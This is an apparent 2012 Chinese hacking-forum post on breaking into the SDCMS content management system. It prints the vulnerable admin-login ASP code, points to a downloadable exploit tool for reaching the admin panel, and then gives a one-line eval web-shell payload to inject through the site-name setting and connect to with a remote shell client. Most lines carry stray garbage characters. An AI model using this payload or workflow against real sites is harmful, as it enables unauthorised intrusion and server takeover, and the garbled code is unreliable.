作者:T00LS 鬼哥3 F7 S+ h; T8 ]! H' E" v2 z: J
漏洞文件:后台目录/index.asp, D# H. j1 }6 l" Y9 E& [- W
6 k* K( Y& j0 v# L$ m5 ASub Check3 X0 |4 V( H; p8 K. m0 w
Dim username,password,code,getcode,Rs0 F+ u+ ?/ b3 @( ]4 l
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub0 @6 Q& S9 P' c! s* X
username=FilterText(Trim(Request.Form("username")),1)" a J. y7 E# }4 Y: I1 m
password=FilterText(Trim(Request.Form("password")),1)
, R+ F. y. }* d& Z6 z3 e8 h$ ` code=Trim(Request.Form("yzm"))
: R7 D/ K$ m9 d! u getcode=Session("SDCMSCode")
, x& u J5 w; m& c* _$ v IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
+ J, Y% ~' l; a' Y1 G! }. T/ s IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied2 E5 f6 Q( F' e4 g, r6 N
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied" w0 f) W; a9 R- L/ ~
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
' T+ ?% G/ P7 G( x; I7 j7 ]; o IF username="" or password="" Then
1 `& F. w; p* T8 w Echo "用户名或密码不能为空"ied
' }, W1 r6 ]4 E( P9 d Else
# c% ` }* ?2 Q) t/ h# B: P Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")! V I; B0 U. N% O+ x5 D$ L
IF Rs.Eof Then
3 O) f1 G/ H' K AddLog username,GetIp,"登录失败",1
8 J B( U4 ^/ Q' x4 [ Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
$ M( f& z6 g( f8 F% x Else: m% V4 _2 ?/ Y/ Q* u
Add_Cookies "sdcms_id",Rs(0)% X7 ? g4 n( x* L R3 H
Add_Cookies "sdcms_name",username
# R* n4 k. d7 f4 ~+ g( C Add_Cookies "sdcms_pwd",Rs(2)% W& L4 [9 V8 o9 ? G; W4 [
Add_Cookies "sdcms_admin",Rs(3)
# j) D2 ?* g8 ?: ]- i- j3 J0 L Add_Cookies "sdcms_alllever",Rs(4)
& L: a, E8 X5 Q; ?8 V+ V Add_Cookies "sdcms_infolever",Rs(5)
$ q9 e2 q: \8 f& O Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
% ]& a9 G) q- ?- [ d# o. g AddLog username,GetIp,"登录成功",1 m; `& z9 P7 r
'自动删除30天前的Log记录+ N! n8 p4 Q- I" E9 U9 l& t
IF Sdcms_DataType Then% B0 I5 x1 h: |/ u. M
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")6 `4 p# u$ N9 v9 g2 y
Else7 t3 c* Q7 g" m
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
! U6 X# X9 ^2 _- E+ L# M2 B/ E End IF
7 W |# y% G5 n: } Go("sdcms_index.asp")
) k8 N0 q. s; M End IF
- X7 m* Z7 E) Q/ N0 h& x0 l1 i Rs.Close/ H4 a, M" w( T
Set Rs=Nothing2 \ z- V( b8 z! }
End IF
: V6 a( N- b! I; a5 z7 YEnd Sub
9 @2 C( V4 o: f' [2 [& z: L5 _& F7 w8 b9 C& z! w! X1 c
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码4 h1 q8 {/ m" _7 U+ f* G
7 c- b% E0 N+ q) w
Function FilterText(ByVal t0,ByVal t1) z8 h1 g* n: k7 Y" u1 m# ~
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
6 D, _- M! N# k" C t0=Trim(t0)
; E" j* \/ g$ Q) W; s( l+ C Select Case t1" S( ]9 n1 ~3 d% o
Case "1"
/ X: s. T6 G/ u: Z* L2 W: Z7 J t0=Replace(t0,Chr(32),"")
: V2 U5 @7 z2 e! B t0=Replace(t0,Chr(13),"")
5 P) d2 E9 J& }$ l8 s# P+ V/ D6 T t0=Replace(t0,Chr(10)&Chr(10),"")
' M8 T, D/ j1 n3 P* }8 U+ c t0=Replace(t0,Chr(10),""), ]% o% T# M1 a8 l9 T& }
Case "2"/ C* Y0 R/ t2 Z: ~3 r! B
t0=Replace(t0,Chr(8),"")'回格
4 H% R$ H y2 \. e2 m3 ]# Y t0=Replace(t0,Chr(9),"")'tab(水平制表符)8 I8 ~* ?( `& a) A; h& b" ?
t0=Replace(t0,Chr(10),"")'换行
/ z2 H! T t4 L0 x- ]4 q0 H' ^ t0=Replace(t0,Chr(11),"")'tab(垂直制表符)& q" @( w0 s# H; w9 l0 F
t0=Replace(t0,Chr(12),"")'换页
3 O' r1 e! [! u' V3 {# Q8 k t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合! T Q" N2 S3 t( u2 W- M
t0=Replace(t0,Chr(22),"") T$ ~* G {* @: Y2 `$ a
t0=Replace(t0,Chr(32),"")'空格 SPACE) g8 o2 E8 |+ }
t0=Replace(t0,Chr(33),"")'!
8 p/ W! }, R$ B: q, l, E t0=Replace(t0,Chr(34),"")'"
+ x" K0 q' ]8 u t0=Replace(t0,Chr(35),"")'#
, b+ t4 K. s- B5 Q3 w$ i t0=Replace(t0,Chr(36),"")'$
; {2 R' ~$ [- M( Z, b t0=Replace(t0,Chr(37),"")'%& X4 K& H1 c; n6 Y' a! a/ T/ q. n
t0=Replace(t0,Chr(38),"")'&
+ P! G% h, a' w3 V! d t0=Replace(t0,Chr(39),"")''
$ Q7 V3 T+ @9 l# N, F( } J7 m t0=Replace(t0,Chr(40),"")'(
7 {3 V/ q+ Q0 r3 t7 Z; Y' u- y" Y t0=Replace(t0,Chr(41),"")')
, s9 h' ^* R7 u7 D2 c! W t0=Replace(t0,Chr(42),"")'*
3 t% B. [: r7 _% { t0=Replace(t0,Chr(43),"")'+
, W4 ~1 ]" E6 A, V t0=Replace(t0,Chr(44),"")',
3 y9 g: z0 _0 i t0=Replace(t0,Chr(45),"")'-
. i" Y5 L/ O# J4 k# v0 T t0=Replace(t0,Chr(46),"")'.' c* A; A5 E( Z( ^/ l* t
t0=Replace(t0,Chr(47),"")'/
5 B8 L2 v7 t2 ?: B* c1 k+ w t0=Replace(t0,Chr(58),"")':
3 t9 `' h; l" w! J8 t+ q2 x t0=Replace(t0,Chr(59),"")';
9 P( }$ ~* c* o t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
) Z8 Z" t: J$ P# M3 \, s t0=Replace(t0,Chr(63),"")'?3 \4 N8 Z6 S# m
t0=Replace(t0,Chr(64),"")'@0 f- {) D4 t4 x# J
t0=Replace(t0,Chr(91),"")'\
/ A+ t4 F7 u; v) ~ t0=Replace(t0,Chr(92),"")'\4 `( y' B0 q; W! M$ d' y4 I
t0=Replace(t0,Chr(93),"")']; a9 D- t" O( W8 n5 ~3 B6 B7 x0 c
t0=Replace(t0,Chr(94),"")'^
9 M7 @( X9 x# r# `; r t0=Replace(t0,Chr(95),"")'_1 N- z6 m8 O$ S6 b
t0=Replace(t0,Chr(96),"")'`
* d, Q( M7 J& V ~1 f( l Z" Z t0=Replace(t0,Chr(123),"")'{
& u2 s% r0 v O t0=Replace(t0,Chr(124),"")'|- C2 l" i, F7 k- T
t0=Replace(t0,Chr(125),"")'}
5 L; z0 @4 W7 p% y" e) H- j t0=Replace(t0,Chr(126),"")'~
) n- c' t9 R& r x; x Case Else
; d6 j# ]' {* n1 u2 Y t0=Replace(t0, "&", "&")
! K+ |" x. g' F% P* r J& @& { t0=Replace(t0, "'", "'"). Z. Z3 @' q6 H7 _
t0=Replace(t0, """", """)6 r' B8 ]2 I, N% L2 v: b4 h
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
. v8 C* s8 x- i" X c: J End Select" @0 Y; B" U0 Q' j3 A8 n- `
IF Instr(Lcase(t0),"expression")>0 Then' } ?/ R- F& }6 p% g9 {
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
9 q W. @' |- s& } End If
) \; X4 b2 Z& B+ z, O3 P FilterText=t04 K# S1 p, G/ ^7 R: I7 h
End Function. V: ~5 b1 L2 r
7 {+ L2 a% ?9 @8 Z
看到没。直接参数是1 只过滤- g' Z( I$ g. H# w
t0=Replace(t0,Chr(32)," ")7 z4 ^2 l) M \
t0=Replace(t0,Chr(13),"")
+ D, z) _# ^9 V! L$ [" s+ p; G t0=Replace(t0,Chr(10)&Chr(10),"
" Y! I+ @ U! x6 e$ V/ t")) z2 V2 n+ J2 e6 s( i9 b$ {
t0=Replace(t0,Chr(10),"
7 b' t+ R7 `( ?- v"); T( P# g! I' s
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
- {2 a% R; W8 J. E" rEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
4 a# w2 X' F6 n" h, X2 C; o D x: u5 P+ `& @
测试:& @% v0 x: P4 J4 O7 j
! i3 R6 u/ j. z! B! K' N3 ]
L& \: S' Z! R, h现在输入工具上验证码,然后点OK5 v# b# S/ U" o' X$ V
3 F; S$ }! B! L7 {
3 w, i1 e9 j, @! ]3 [看到我们直接进入后台管理界面了,呵呵!
: O$ | o6 i! g9 ^) g6 f" H
, [* C% W; V8 U3 I2 i$ f+ Y. ]1 \8 j: b: n$ x: \" k
5 {. N0 D! Z2 K$ I$ a( W
这样直接进入后台了。。。。
& G8 L+ J* j ~+ O! H& r8 w- q( L+ F3 ~2 ?/ c
- k& e7 R) F' m0 r* s2 ^
& k6 U9 _/ n _% c! ZSDCMS提权:
1 d: z, ]6 J5 A3 b8 a2 U6 d# a, G7 u
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?7 t6 y6 u2 B$ _1 y: f/ n" H
. l4 ~; I" W1 q
7 z( J" D" s8 B {1 O2 E0 {1 i4 D! T0 D" |
OK,现在用菜刀连接下!8 _9 q9 E) [% \# x4 S* v! E5 Y
3 G4 ` C% l/ Y
2 H5 ~% | q. v& Z8 Y, N" G2 M
# \9 n( Q" ]1 C1 `( m' b$ G0 J+ L
6 w* f: H' S3 H1 L# [1 p% I5 ?
+ A& |8 D4 C5 G# e8 Q( \ |
发表于 2012-11-9 20:57:02
收藏
支持
反对